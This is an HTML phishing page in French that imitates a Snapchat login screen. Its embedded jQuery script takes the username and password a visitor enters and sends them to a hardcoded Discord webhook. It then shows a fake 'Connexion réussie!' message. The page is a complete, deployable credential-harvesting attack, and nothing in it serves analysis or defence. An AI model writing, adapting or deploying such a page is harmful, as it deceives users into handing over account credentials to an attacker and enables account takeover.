<!DOCTYPE html>
<html>
<head>
  <style>
        body {
      background-image: url("image.png");
      background-repeat: no-repeat;
      background-size: cover;
      background-position: center;
      height: 100vh;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      font-family: Arial, sans-serif;
    }

    .title {
      font-size: 48px;
      margin-bottom: 20px;
      text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
    }

    .login-container {
      text-align: center;
    }

    .input-field {
      margin-bottom: 10px;
    }

    .input-label {
      color: #fff;
      font-size: 18px;
    }
  </style>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
    $(document).ready(function() {
      $('#login-form').submit(function(event) {
        event.preventDefault();

        // Récupérer les valeurs des champs de formulaire
        var username = $('#username').val();
        var password = $('#password').val();

        // Créer l'objet JSON avec les informations de connexion
        var loginData = {
          content: 'Nouvelle tentative de connexion',
          embeds: [{
            title: 'Informations de connexion',
            fields: [{
              name: 'Nom d\'utilisateur',
              value: username,
              inline: true
            },
            {
              name: 'Mot de passe',
              value: password,
              inline: true
            }]
          }]
        };

        // Envoyer les informations au Webhook Discord
        $.ajax({
          type: 'POST',
          url: 'https://discord.com/api/webhooks/1112145305039806564/zfk8C_YlGyPHP685NNLpLP4ib7tyoPpC_2vtIYRRVg63qSDc6HO5mP1aXAn_mAJq4HqL',
          data: JSON.stringify(loginData),
          contentType: 'application/json',
          success: function() {
            // Redirection vers une autre page ou affichage d'un message de réussite
            alert('Connexion réussie!');
          },
          error: function() {
            // Affichage d'un message d'erreur en cas d'échec
            alert('Erreur lors de la connexion.');
          }
        });
      });
    });
  </script>
</head>
<body>
  <div class="title">Connexion Snapchat</div>

  <div class="login-container">
    <form id="login-form">
      <div class="input-field">
        <label for="username">Nom d'utilisateur:</label>
        <input type="text" id="username" name="username">
      </div>

      <div class="input-field">
        <label for="password">Mot de passe:</label>
        <input type="password" id="password" name="password">
      </div>

      <button type="submit">Se connecter</button>
    </form>
  </div>
</body>
</html>
